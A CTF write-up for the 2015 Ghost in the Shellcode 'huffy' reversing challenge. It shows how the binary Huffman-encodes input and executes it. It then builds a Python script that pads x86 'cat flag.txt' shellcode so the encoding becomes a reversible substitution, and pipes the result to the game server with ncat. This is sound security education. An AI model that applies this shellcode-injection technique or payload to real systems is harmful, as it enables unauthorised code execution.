Find the key!
File: File
Server: huffy.2015.ghostintheshellcode.com:8143
This was the only “official” reversing challenge in the 2015 edition of the Ghost in the Shellcode CTF. It was made available several hours before the end of the competition and worth 300 juicy points.
Executing the binary and entering some random text yields a lot of output:
$ ./huffy
CWD: ~/CTF/2015_01_GitS/rev300_huffy
AAAA
Nibble Frequency
------ ---------
0 0.100000
1 0.400000
2 0.000000
3 0.000000
4 0.400000
5 0.000000
6 0.000000
7 0.000000
8 0.000000
9 0.000000
a 0.100000
b 0.000000
c 0.000000
d 0.000000
e 0.000000
f 0.000000
Read 5 bytes
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.000000
Two lowest frequencies: 0.000000 and 0.100000
Two lowest frequencies: 0.100000 and 0.100000
Two lowest frequencies: 0.200000 and 0.200000
Two lowest frequencies: 0.400000 and 0.400000
Two lowest frequencies: 0.400000 and 0.800000
Breaking!
0 --0-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
1 --0-- 0x804c3c0
2 --0-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
3 --1-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
4 --1-- 0x804c3a8 --1-- 0x804c3c0
5 --1-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
6 --1-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
7 --1-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
8 --1-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
9 --1-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
a --1-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
b --1-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
c --1-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
d --1-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
e --1-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
f --1-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0
Encoding input...
ASCII Encoded: 110110110110101010111
Binary Encoded:
�j
Executing encoded input...
[1] 10542 segmentation fault (core dumped) ./huffy
Okay, let’s see what is going on here. It prints out the current working dir and
asks for input. After being fed with data and pressing C-d
to signal a EOF,
the binary performs a frequency analysis on the nibbles of the input and prints
out the result. Indeed, we find (including the “invisible” newline character)
echo "AAAA" | hd
00000000 41 41 41 41 0a |AAAA.|
00000005
\[
P(X = ‘0’) = \frac{1}{10} = 0.1 \
P(X = ‘1’) = \frac{4}{10} = 0.4 \
P(X = ‘4’) = \frac{4}{10} = 0.4 \
P(X = ‘a’) = \frac{1}{10} = 0.1 \
\]
which is consistent with the relative frequencies displayed by the program.
Afterwards we see that the two lowest frequencies are added iteratively to each
other to construct a tree, which is eventually printed out. Sounds familiar?
It should, together with the name of the challenge huffy
it becomes obvious
that this is a straightforward construction of a huffman tree. Thus, the tree
not only gives us the heap addresses of the allocated tree nodes but also the
bit sequences each input nibble will be substituted with. Note that the bit
sequences are inverted as they are pointing from the leaf towards the root of
the tree – looking at the binary representation (gracefully given to us on
stderr
) we can see the bit sequence our input AAAA\n
is transformed to:
echo "AAAA" | ./huffy 2>&1 | hd | tail -n 6
00000e30 31 31 30 31 31 30 31 31 30 31 31 30 31 30 31 30 |1101101101101010|
00000e40 31 30 31 31 31 0a 42 69 6e 61 72 79 20 45 6e 63 |10111.Binary Enc|
00000e50 6f 64 65 64 3a 0a db 6a 17 0a 45 78 65 63 75 74 |oded:..j..Execut|
00000e60 69 6e 67 20 65 6e 63 6f 64 65 64 20 69 6e 70 75 |ing encoded inpu|
00000e70 74 2e 2e 2e 0a |t....|
00000e75
Using the tree from above substituting each nibble by its associated bit sequence, we find:
'AAAA\n' = 0x41 0x41 0x41 0x41 0x0a
= 0x4 0x1 0x4 0x1 0x4 0x1 0x4 0x1 0x0 0xa
= 11 0 11 0 11 0 11 0 1010 10111
= 11011011 01101010 10111
= 0xdb 0x6a 0x17
After compressing the input the program prints Executing encoded input...
.
This probably is the reason why it segfauls afterwards (the byte
sequence db 6a 17
does not form valid instructions). Verifying with gdb tells
us that this assumption is correct.
$ gdb ./huffy
gdb-peda$ r >/dev/null
Starting program: ~/CTF/2015_01_GitS/rev300_huffy/huffy >/dev/null
AAAA
�j
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xf7fd5000 --> 0x176adb
EBX: 0xf7fac960 --> 0xfbad2887
ECX: 0xf7fad878 --> 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x804c3ee --> 0x0
EBP: 0xffffd088 --> 0x0
ESP: 0xffffc80c --> 0x804902e (<main+502>: mov eax,ds:0x804b080)
EIP: 0xf7fd5000 --> 0x176adb
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xf7fd5000: fld TBYTE PTR [edx+0x17]
0xf7fd5003: add BYTE PTR [eax],al
0xf7fd5005: add BYTE PTR [eax],al
0xf7fd5007: add BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
0000| 0xffffc80c --> 0x804902e (<main+502>: mov eax,ds:0x804b080)
0004| 0xffffc810 --> 0xf7facac0 --> 0xfbad2884
0008| 0xffffc814 --> 0x1
0012| 0xffffc818 --> 0x3
0016| 0xffffc81c --> 0xf7fac960 --> 0xfbad2887
0020| 0xffffc820 --> 0x0
0024| 0xffffc824 --> 0x0
0028| 0xffffc828 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fd5000 in ?? ()
gdb-peda$ x/20xb $pc
0xf7fd5000: 0xdb 0x6a 0x17 0x00 0x00 0x00 0x00 0x00
0xf7fd5008: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xf7fd5010: 0x00 0x00 0x00 0x00
To summarize: We feed payload into the program which is encoded using a huffman compression which then is executed by the program. As we also have a remote address of the binary this means we get a free shell as long as we are able to find an input string which gets compressed to shellcode (kinda weird, isn’t it?).
Let’s recap a little bit of basic information theory: Shannon’s coding theorem tells us that a lower bound for any compression algorithm is the entropy of the input source in bits per symbol. We want the hufman compression to have as least impact on our input as possible such that it doesn’t damage the shellcode we’re feeding into the binary. To make huffman coding performing as bad as possible we thus need to maximize the entropy of the source. In order to achieve this, basic math tells us that each input symbol needs to be equally likely. The input symbols are the nibbles of the original data given to the binary. Let’s see what happens if we throw such a string into the binary:
$ echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" | ./huffy
CWD: ~/CTF/2015_01_GitS/rev300_huffy
Nibble Frequency
------ ---------
0 0.062500
1 0.062500
2 0.062500
3 0.062500
4 0.062500
5 0.062500
6 0.062500
7 0.062500
8 0.062500
9 0.062500
a 0.062500
b 0.062500
c 0.062500
d 0.062500
e 0.062500
f 0.062500
Read 8 bytes
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.500000 and 0.500000
Breaking!
0 --0--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
1 --0--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
2 --0--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
3 --0--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
4 --0--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
5 --0--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
6 --0--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
7 --0--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
8 --1--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
9 --1--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
a --1--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
b --1--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
c --1--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
d --1--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
e --1--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
f --1--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
Encoding input...
ASCII Encoded: 0000100011000100011011101010001000111011111101110101110110010001
Binary Encoded:
�n�;�]�
Executing encoded input...
[1] 10361 done echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" |
10362 segmentation fault (core dumped) ./huffy
Awesome! The algorithm is unable to compress our input any further, effectively turning the huffman compression into a simple substitution. Inverting the bits (remember that the list above is starting at the leaves) we obtain the following substitution table:
0 -> 0
1 -> 8
2 -> c
3 -> 4
4 -> 6
5 -> e
6 -> a
7 -> 2
8 -> 3
9 -> b
a -> f
b -> 7
c -> 5
d -> d
e -> 9
f -> 1
This makes the rest pretty easy: Take the shellcode, append it such that all nibbles are equally likely in the whole input source and do the inverse substituation. We can write a small python script which does that for us:
#!/usr/bin/python
import sys
import binascii
# Simple x86 "cat flag.txt" shellcode
s = "eb37b0050fb6c05b31c9884b08cd8089c3b0030fb6c031d2b68029d489e1cd8089c2b0040fb6c0b3010fb6db89e1cd80b0010fb6c031dbcd80e8c4ffffff666c61672e74787441"
c = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
i = 0
m = 0
for i in range(len(s)):
c[int(s[i], 16)] += 1
for i in range(len(c)):
if c[i] > m:
m = c[i]
for i in range(len(c)):
h = "%x" % i
s += h * (m - c[i])
for c in s:
if i % 2 == 0: sys.stdout.write("\\x")
if c == "0": sys.stdout.write("0")
if c == "8": sys.stdout.write("1")
if c == "4": sys.stdout.write("3")
if c == "c": sys.stdout.write("2")
if c == "2": sys.stdout.write("7")
if c == "a": sys.stdout.write("6")
if c == "6": sys.stdout.write("4")
if c == "e": sys.stdout.write("5")
if c == "9": sys.stdout.write("e")
if c == "5": sys.stdout.write("c")
if c == "d": sys.stdout.write("d")
if c == "3": sys.stdout.write("8")
if c == "b": sys.stdout.write("9")
if c == "7": sys.stdout.write("b")
if c == "f": sys.stdout.write("a")
if c == "1": sys.stdout.write("f")
The rest is a matter of
$ ./pwn.py | ncat huffy.2015.ghostintheshellcode.com 8143
which gives us a flag worth 300 points.
As a summary: We’ve just solved a reversing binary without ever having to look at the disassembly itself. The debug prints make it really obvious how to solve the task. On the other hand, playing a WAV file on an oscilloscope (as demanded in a different challenge) was considered to be worth only 200 points – not very balanced.